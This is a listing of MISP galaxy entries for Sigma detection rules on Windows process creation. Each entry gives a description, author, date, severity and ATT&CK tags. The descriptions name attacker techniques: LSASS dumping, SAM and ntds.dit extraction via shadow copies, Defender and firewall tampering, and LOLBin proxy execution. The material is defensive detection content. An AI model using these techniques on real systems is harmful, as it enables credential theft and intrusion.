Suspicious Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.

Internal MISP references

UUID cb0fe7c5-f3a3-484d-aa25-d350a7912729 which can be used as unique global reference for Suspicious Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-23
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_driver_install_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Systeminfo

Detects usage of the "systeminfo" command to retrieve information

Internal MISP references

UUID 0ef56343-059e-4cb6-adc1-4c3c967c5e46 which can be used as unique global reference for Suspicious Execution of Systeminfo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-01
falsepositive ['Unknown']
filename proc_creation_win_systeminfo_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location

Internal MISP references

UUID cc368ed0-2411-45dc-a222-510ace303cb2 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-25
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.009']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

Internal MISP references

UUID 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 which can be used as unique global reference for SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-07-16
falsepositive ['Unknown']
filename proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Autorun Registry Modified via WMI

Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.

Internal MISP references

UUID c80e66d8-1780-48a9-b412-46663fd21ac0 which can be used as unique global reference for Suspicious Autorun Registry Modified via WMI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-02-17
falsepositive ['Legitimate administrative activity or software installations']
filename proc_creation_win_autorun_registry_modified_via_wmic.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1547.001', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Use of Remote.exe

Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.

Internal MISP references

UUID 4eddc365-79b4-43ff-a9d7-99422dc34b93 which can be used as unique global reference for Use of Remote.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022-06-02
falsepositive ['Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).']
filename proc_creation_win_lolbin_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution

Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.

Internal MISP references

UUID 02b18447-ea83-4b1b-8805-714a8a34546a which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-03-06
falsepositive ['Unknown']
filename proc_creation_win_offlinescannershell_mpclient_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Detects the execution of a renamed version of the Plink binary

Internal MISP references

UUID 1c12727d-02bf-45ff-a9f3-d49806a3cf43 which can be used as unique global reference for Renamed Plink Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-06
falsepositive ['Unknown']
filename proc_creation_win_renamed_plink.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Wscript Shell Run In CommandLine

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity

Internal MISP references

UUID 2c28c248-7f50-417a-9186-a85b223010ee which can be used as unique global reference for Wscript Shell Run In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-31
falsepositive ['Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly']
filename proc_creation_win_mshta_inline_vbscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Uncommon Userinit Child Process

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

Internal MISP references

UUID 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 which can be used as unique global reference for Uncommon Userinit Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure), Tim Shelton
creation_date 2019-01-12
falsepositive ['Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.']
filename proc_creation_win_userinit_uncommon_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.t1037.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

PUA - PingCastle Execution From Potentially Suspicious Parent

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.

Internal MISP references

UUID b37998de-a70b-4f33-b219-ec36bf433dc0 which can be used as unique global reference for PUA - PingCastle Execution From Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024-01-11
falsepositive ['Unknown']
filename proc_creation_win_pua_pingcastle_script_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1595']
Related clusters

To see the related clusters, click here.

PowerShell Web Access Feature Enabled Via DISM

Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse

Internal MISP references

UUID 7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f which can be used as unique global reference for PowerShell Web Access Feature Enabled Via DISM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag
creation_date 2024-09-03
falsepositive ['Legitimate PowerShell Web Access installations by administrators']
filename proc_creation_win_dism_enable_powershell_web_access_feature.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.persistence', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious Chromium Browser Instance Executed With Custom Extension

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

Internal MISP references

UUID 27ba3207-dd30-4812-abbf-5d20c57d474e which can be used as unique global reference for Suspicious Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022-06-19
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_susp_load_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176.001']
Related clusters

To see the related clusters, click here.

HackTool - Potential Impacket Lateral Movement Activity

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

Internal MISP references

UUID 10c14723-61c7-4c75-92ca-9af245723ad2 which can be used as unique global reference for HackTool - Potential Impacket Lateral Movement Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
creation_date 2019-09-03
falsepositive ['Unknown']
filename proc_creation_win_hktl_impacket_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral-movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Regsvr32 Execution From Potential Suspicious Location

Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.

Internal MISP references

UUID 9525dc73-0327-438c-8c04-13c0e037e9da which can be used as unique global reference for Regsvr32 Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-26
falsepositive ['Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.']
filename proc_creation_win_regsvr32_susp_exec_path_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

LSASS Dump Keyword In CommandLine

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

Internal MISP references

UUID ffa6861c-4461-4f59-8a41-578c39f3f23e which can be used as unique global reference for LSASS Dump Keyword In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-10-24
falsepositive ['Unlikely']
filename proc_creation_win_susp_lsass_dmp_cli_keywords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Abusing Print Executable

Attackers can use print.exe for remote file copy

Internal MISP references

UUID bafac3d6-7de9-4dd9-8874-4a1194b493ed which can be used as unique global reference for Abusing Print Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
creation_date 2020-10-05
falsepositive ['Unknown']
filename proc_creation_win_print_remote_file_copy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

HackTool - SharpUp PrivEsc Tool Execution

Detects the use of SharpUp, a tool for local privilege escalation

Internal MISP references

UUID c484e533-ee16-4a93-b6ac-f0ea4868b2f1 which can be used as unique global reference for HackTool - SharpUp PrivEsc Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-08-20
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpup.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1569.002', 'attack.t1574.005']
Related clusters

To see the related clusters, click here.

Php Inline Command Execution

Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.

Internal MISP references

UUID d81871ef-5738-47ab-9797-7a9c90cd4bfb which can be used as unique global reference for Php Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-02
falsepositive ['Unknown']
filename proc_creation_win_php_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious File Download From IP Via Wget.EXE

Detects potentially suspicious file downloads directly from IP addresses using Wget.exe

Internal MISP references

UUID 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-27
falsepositive ['Unknown']
filename proc_creation_win_wget_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Driver Install by pnputil.exe

Detects when a possible suspicious driver is being installed via pnputil.exe lolbin

Internal MISP references

UUID a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 which can be used as unique global reference for Suspicious Driver Install by pnputil.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
creation_date 2021-09-30
falsepositive ['Pnputil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

IIS Native-Code Module Command Line Installation

Detects suspicious IIS native-code module installations via command line

Internal MISP references

UUID 9465ddf4-f9e4-4ebd-8d98-702df3a93239 which can be used as unique global reference for IIS Native-Code Module Command Line Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-12-11
falsepositive ['Unknown as it may vary from organisation to organisation how admins use to install IIS modules']
filename proc_creation_win_iis_appcmd_susp_module_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Use of UltraVNC Remote Access Software

An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks

Internal MISP references

UUID 145322e4-0fd3-486b-81ca-9addc75736d8 which can be used as unique global reference for Use of UltraVNC Remote Access Software in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-10-02
falsepositive ['Legitimate use']
filename proc_creation_win_ultravnc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Enumerate All Information With Whoami.EXE

Detects the execution of "whoami.exe" with the "/all" flag

Internal MISP references

UUID c248c896-e412-4279-8c15-1c558067b6fa which can be used as unique global reference for Enumerate All Information With Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-12-04
falsepositive ['Unknown']
filename proc_creation_win_whoami_all_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Command Execution Via FTP.EXE

Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".

Internal MISP references

UUID 06b401f4-107c-4ff9-947f-9ec1e7649f1e which can be used as unique global reference for Potential Arbitrary Command Execution Via FTP.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020-10-09
falsepositive ['Unknown']
filename proc_creation_win_ftp_arbitrary_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Sensitive File Access Via Volume Shadow Copy Backup

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

Internal MISP references

UUID f57f8d16-1f39-4dcb-a604-6c73d9b54b3d which can be used as unique global reference for Sensitive File Access Via Volume Shadow Copy Backup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021-08-09
falsepositive ['Unlikely']
filename proc_creation_win_susp_sensitive_file_access_shadowcopy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential LethalHTA Technique Execution

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

Internal MISP references

UUID ed5d72a6-f8f4-479d-ba79-02f6a80d7471 which can be used as unique global reference for Potential LethalHTA Technique Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018-06-07
falsepositive ['Unknown']
filename proc_creation_win_mshta_lethalhta_technique.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Office Document Executed From Trusted Location

Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.

Internal MISP references

UUID f99abdf0-6283-4e71-bd2b-b5c048a94743 which can be used as unique global reference for Potentially Suspicious Office Document Executed From Trusted Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-21
falsepositive ['Unknown']
filename proc_creation_win_office_exec_from_trusted_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Remote Access Tool - AnyDesk Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b52e84a3-029e-4529-b09b-71d19dd27e94 which can be used as unique global reference for Remote Access Tool - AnyDesk Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_anydesk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Windows App Activity

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

Internal MISP references

UUID f91ed517-a6ba-471d-9910-b3b4a398c0f3 which can be used as unique global reference for Potentially Suspicious Windows App Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-12
falsepositive ['Legitimate packages that make use of external binaries such as Windows Terminal']
filename proc_creation_win_susp_appx_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

REGISTER_APP.VBS Proxy Execution

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

Internal MISP references

UUID 1c8774a0-44d4-4db0-91f8-e792359c70bd which can be used as unique global reference for REGISTER_APP.VBS Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-19
falsepositive ["Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign"]
filename proc_creation_win_lolbin_register_app.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Where Execution

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Internal MISP references

UUID 725a9768-0f5e-4cb3-aec2-bc5719c6831a which can be used as unique global reference for Suspicious Where Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-12-13
falsepositive ['Unknown']
filename proc_creation_win_where_browser_data_recon.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Potential Windows Defender Tampering Via Wmic.EXE

Detects potential tampering with Windows Defender settings such as adding exclusion using wmic

Internal MISP references

UUID 51cbac1e-eee3-4a90-b1b7-358efb81fa0a which can be used as unique global reference for Potential Windows Defender Tampering Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-11
falsepositive ['Unknown']
filename proc_creation_win_wmic_namespace_defender.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1047', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Firewall Disabled via Netsh.EXE

Detects netsh commands that turns off the Windows firewall

Internal MISP references

UUID 57c4bf16-227f-4394-8ec7-1b745ee061c3 which can be used as unique global reference for Firewall Disabled via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Fatih Sirin
creation_date 2019-11-01
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_disable.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.004', 'attack.s0108']
Related clusters

To see the related clusters, click here.

PUA - Crassus Execution

Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.

Internal MISP references

UUID 2c32b543-1058-4808-91c6-5b31b8bed6c5 which can be used as unique global reference for PUA - Crassus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023-04-17
falsepositive ['Unlikely']
filename proc_creation_win_pua_crassus.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.reconnaissance', 'attack.t1590.001']
Related clusters

To see the related clusters, click here.

Potential Data Stealing Via Chromium Headless Debugging

Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control

Internal MISP references

UUID 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 which can be used as unique global reference for Potential Data Stealing Via Chromium Headless Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-23
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_debugging.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.credential-access', 'attack.collection', 'attack.t1185', 'attack.t1564.003']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Installation Execution

Detects ScreenConnect program starts that establish a remote access to a system.

Internal MISP references

UUID 75bfe6e6-cd8e-429e-91d3-03921e1d7962 which can be used as unique global reference for Remote Access Tool - ScreenConnect Installation Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-02-11
falsepositive ['Legitimate use by administrative staff']
filename proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.initial-access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

PowerShell Get-Process LSASS

Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity

Internal MISP references

UUID b2815d0d-7481-4bf0-9b6c-a4c48a94b349 which can be used as unique global reference for PowerShell Get-Process LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-04-23
falsepositive ['Unknown']
filename proc_creation_win_powershell_getprocess_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

Registry Modification Via Regini.EXE

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

Internal MISP references

UUID 5f60740a-f57b-4e76-82a1-15b6ff2cb134 which can be used as unique global reference for Registry Modification Via Regini.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Eli Salem, Sander Wiebing, oscd.community
creation_date 2020-10-08
falsepositive ['Legitimate modification of keys']
filename proc_creation_win_regini_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1112', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Suspicious Provlaunch.EXE Child Process

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID f9999590-1f94-4a34-a91e-951e47bedefd which can be used as unique global reference for Suspicious Provlaunch.EXE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Attempts of Kerberos Coercion Via DNS SPN Spoofing

Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, or checking for the presence of such records through the nslookup command.

Internal MISP references

UUID 0ed99dda-6a35-11ef-8c99-0242ac120002 which can be used as unique global reference for Attempts of Kerberos Coercion Via DNS SPN Spoofing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-06-20
falsepositive ['Unknown']
filename proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.credential-access', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1557.001', 'attack.t1187']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocation From Script Engines

Detects suspicious powershell invocations from interpreters or unusual programs

Internal MISP references

UUID 95eadcb2-92e4-4ed1-9031-92547773a6db which can be used as unique global reference for Suspicious PowerShell Invocation From Script Engines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-01-16
falsepositive ['Microsoft Operations Manager (MOM)', 'Other scripts']
filename proc_creation_win_powershell_script_engine_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

File Download From IP URL Via Curl.EXE

Detects file downloads directly from IP address URL using curl.exe

Internal MISP references

UUID 9cc85849-3b02-4cb5-b371-3a1ff54f2218 which can be used as unique global reference for File Download From IP URL Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-10-18
falsepositive ['Unknown']
filename proc_creation_win_curl_download_direct_ip_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

OneNote.EXE Execution of Malicious Embedded Scripts

Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.

Internal MISP references

UUID 84b1706c-932a-44c4-ae28-892b28a25b94 which can be used as unique global reference for OneNote.EXE Execution of Malicious Embedded Scripts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @kostastsale
creation_date 2023-02-02
falsepositive ['Unlikely']
filename proc_creation_win_office_onenote_embedded_script_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.001']
Related clusters

To see the related clusters, click here.

MpiExec Lolbin

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

Internal MISP references

UUID 729ce0ea-5d8f-4769-9762-e35de441586d which can be used as unique global reference for MpiExec Lolbin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-11
falsepositive ['Unknown']
filename proc_creation_win_lolbin_mpiexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Install New Package Via Winget Local Manifest

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

Internal MISP references

UUID 313d6012-51a0-4d93-8dfc-de8553239e25 which can be used as unique global reference for Install New Package Via Winget Local Manifest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Florian Roth (Nextron Systems), frack113
creation_date 2020-04-21
falsepositive ['Some false positives are expected in some environment that may use this functionality to install and test their custom applications']
filename proc_creation_win_winget_local_install_via_manifest.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

